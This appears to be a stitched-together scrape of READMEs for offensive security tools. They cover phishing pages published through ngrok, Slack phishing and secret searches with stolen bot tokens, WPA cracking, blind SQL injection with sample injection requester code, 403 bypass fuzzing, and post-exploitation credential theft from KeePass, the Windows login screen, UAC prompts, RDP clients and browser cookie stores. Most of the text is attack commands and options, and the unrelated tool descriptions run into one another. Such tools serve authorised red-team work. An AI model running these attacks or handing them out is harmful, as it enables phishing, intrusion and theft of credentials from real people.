Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.
```bash git clone https://github.com/davenisc/thief_raccoon.git cd thief_raccoon
```bash apt install python3.11-venv
```bash python -m venv raccoon_venv source raccoon_venv/bin/activate
```bash pip install -r requirements.txt
Usage
```bash python app.py
After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.
If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.
If you want to make the phishing page accessible over the internet, use ngrok.
Using ngrok
Download ngrok from ngrok.com and follow the installation instructions for your operating system.
Expose your local server to the internet:
Get the public URL:
After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.
How to install Ngrok on Linux?
```bash curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok
```bash ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx
Deploy your app online
Put your app online at ephemeral domain Forwarding to your upstream service. For example, if it is listening on port http://localhost:8080, run:
```bash ngrok http http://localhost:5000
Example
```bash python app.py
```bash Select the operating system for phishing: 1. Windows 10 2. Windows 11 3. Windows XP 4. Windows Server 5. Ubuntu 6. Ubuntu Server 7. macOS Enter the number of your choice: 2
Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.
Disclaimer
This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.
License
This project is licensed under the MIT License. See the LICENSE file for details.
ScreenShots
Credits
Developer: @davenisc Web: https://davenisc.com
ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.
<binary>
: Path to the binary file for analysis.-s, --search SEARCH
: Optional. Search for specific instruction patterns.-f, --functions
: Optional. Print function names and addresses.python3 ropdump.py /path/to/binary
python3 ropdump.py /path/to/binary -s "pop eax"
python3 ropdump.py /path/to/binary -f
A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.
This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.
Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an api token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, files, and search for secrets leaked in slack.
In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)
EvilSlackbot requires python3 and Slackclient
pip3 install slackclient
usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
[-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]
options:
-h, --help show this help message and exit
Required:
-t TOKEN, --token TOKEN
Slack Oauth token
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc
(Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token
(Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f
and -e,-eL, or -cH)
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL
Email of target
-cH CHANNEL, --channel CHANNEL
Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST
Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks
associated with your provided token.
-o OUTFILE, --outfile OUTFILE
Outfile to store search results
-cL, --channel_list List all public Slack channels
To use this tool, you must provide a xoxb or xoxp token.
Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>
Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)
With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>
With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>
With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.
python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>
With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL Email of target
-cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks associated with your provided token.
-o OUTFILE, --outfile OUTFILE Outfile to store search results
-cL, --channel_list List all public Slack channels
With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.
python3 EvilSlackbot.py -t <xoxb token> -cL
Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.
WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).
The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.
Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.
These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:
See CHANGELOG file for a better description.
Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.
You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023
More information can be found in our paper and slides.
To install Hakuin, simply run:
pip3 install hakuin
Developers should install the package locally and set the -e
flag for editable mode:
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester
and override the request
method. Also, the method must determine whether the query resolved to True
or False
.
import aiohttp
from hakuin import Requester
class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()
To start extracting data, use the Extractor
class. It requires a DBMS
object to contruct queries and a Requester
object to inject them. Hakuin currently supports SQLite
, MySQL
, PSQL
(PostgreSQL), and MSSQL
(SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS
interface defined in hakuin/dbms/DBMS.py
.
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL
class StatusRequester(Requester):
...
async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())
Now that eveything is set, you can start extracting DB metadata.
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')
metadata = await ext.extract_meta(strategy='model')
Once you know the structure, you can extract the actual content.
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
res = await ext.extract_column_int(table='users', column='id')
res = await ext.extract_column_float(table='products', column='price')
res = await ext.extract_column_blob(table='users', column='id')
More examples can be found in the tests
directory.
Hakuin comes with a simple wrapper tool, hk.py
, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
python3 hk.py -h
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
The original 403fuzzer.py :)
Fuzz 401/403ing endpoints for bypasses
This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.
It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.
I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.
You can now feed it raw HTTP requests that you save to a file from Burp.
usage: bypassfuzzer.py -h
Simply paste the request into a file and run the script!
- It will parse and use cookies
& headers
from the request. - Easiest way to authenticate for your requests
python3 bypassfuzzer.py -r request.txt
Specify a URL
python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html
Specify cookies to use in requests:
some examples:
--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"
Specify a method/verb and body data to send
bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah¶m2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah¶m2=blah2"
Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>
Specify -H "header: value"
for each additional header you'd like to add:
bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"
Based on response code and length. If it sees a response 8 times or more it will automatically mute it.
Repeats are changeable in the code until I add an option to specify it in flag
NOTE: Can't be used simultaneously with -hc
or -hl
(yet)
# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart
Useful if you wanna proxy through Burp
bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080
# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers
# Skip sending path normailization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls
Provide comma delimited lists without spaces. Examples:
# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400
# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638
SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
bash pip3 install sqlmc
Run sqlmc
with the following command-line arguments:
-u, --url
: The URL to scan (required)-d, --depth
: The depth to scan (required)-o, --output
: The output file to save the resultsExample usage:
sqlmc -u http://example.com -d 2
Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.
The tool will then perform the scan and display the results.
This project is licensed under the GNU Affero General Public License v3.0.
HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)
Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.
python3 HardeningMeter.py -f /bin/cp -s
Before installing HardeningMeter, make sure your machine has the following: 1. readelf
and file
commands 2. python version 3 3. pip 4. tabulate
pip install tabulate
The very latest developments can be obtained via git.
Clone or download the project files (no compilation nor installation is required)
git clone https://github.com/OfriOuzan/HardeningMeter
Specify the files you want to scan, the argument can get more than one file seperated by spaces.
Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.
Specify whether you want to add external checks (False by default).
Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.
Specify if you want to scan the system hardening methods.
Specify if you want to save the results to csv file (results are printed as a table to stdout by default).
HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.
When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.
ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.
The accompanying blog post can be found here
Rustup must be installed, follow the instructions available here : https://rustup.rs/
The mingw-w64 package must be installed. On Debian, this can be done using :
apt install mingw-w64
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu
Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin
After adding Mono repositories, Nuget can be installed using apt :
apt install nuget
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
.
Rustup must be installed, follow the instructions available here : https://rustup.rs/
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc
.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)
All modules have been tested on the following Windows versions :
Windows Version |
---|
Windows Server 2022 |
Windows Server 2019 |
Windows Server 2016 |
Windows Server 2012R2 |
Windows 10 |
Windows 11 |
[!CAUTION] Modules have not been tested on other version, and are expected to not work.
Application | Injection Method |
---|---|
KeePass.exe | AppDomainManager Injection |
KeePassXC.exe | DLL Proxying |
LogonUI.exe (Windows Login Screen) | COM Hijacking |
consent.exe (Windows UAC Popup) | COM Hijacking |
mstsc.exe (Windows default RDP client) | COM Hijacking |
RDCMan.exe (Sysinternals' RDP client) | COM Hijacking |
MobaXTerm.exe (3rd party RDP client) | COM Hijacking |
[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the
cleanup
module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.
ThievingFox contains 3 main modules : poison
, cleanup
and collect
.
For each application specified in the command line parameters, the poison
module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.
To speed up the process of compilation of all libraries, a cache is maintained in client/cache/
.
--mstsc
, --rdcman
, and --mobaxterm
have a specific option, respectively --mstsc-poison-hkcr
, --rdcman-poison-hkcr
, and --mobaxterm-poison-hkcr
. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR
hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU
hive).
--keepass
and --keepassxc
have specific options, --keepass-path
, --keepass-share
, and --keepassxc-path
, --keepassxc-share
, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.
The KeePass modules requires the Visual C++ Redistributable
to be installed on the target.
Multiple applications can be specified at once, or, the --all
flag can be used to target all applications.
[!IMPORTANT] Remember to clean the cache if you ever change the
--tempdir
parameter, since the directory name is embedded inside native DLLs.
$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--ke epassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications
For each application specified in the command line parameters, the cleanup
first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.
For applications that support poisonning of both HKCU
and HKCR
hives, both are cleaned up regardless.
Multiple applications can be specified at once, or, the --all
flag can be used to cleanup all applications.
It does not clean extracted credentials on the remote host.
[!IMPORTANT] If the targeted application is in use while the
cleanup
module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, thecleanup
module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted byThievingFox
are logged.
$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications
For each application specified on the command line parameters, the collect
module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir>
corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/
.
Multiple applications can be specified at once, or, the --all
flag can be used to collect logs from all applications.
$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of th e domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications
Infromations Web Application Security
sudo apt install python3 python3-pip
pip3 install termcolor
pip3 install google
pip3 install optioncomplete
pip3 install bs4
pip3 install prettytable
git clone https://github.com/Matrix07ksa/HackerInfo/
cd HackerInfo
chmod +x HackerInfo
./HackerInfo -h
python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
h ttps://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################
sudo python setup.py install
pip3 install hackinfo
Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
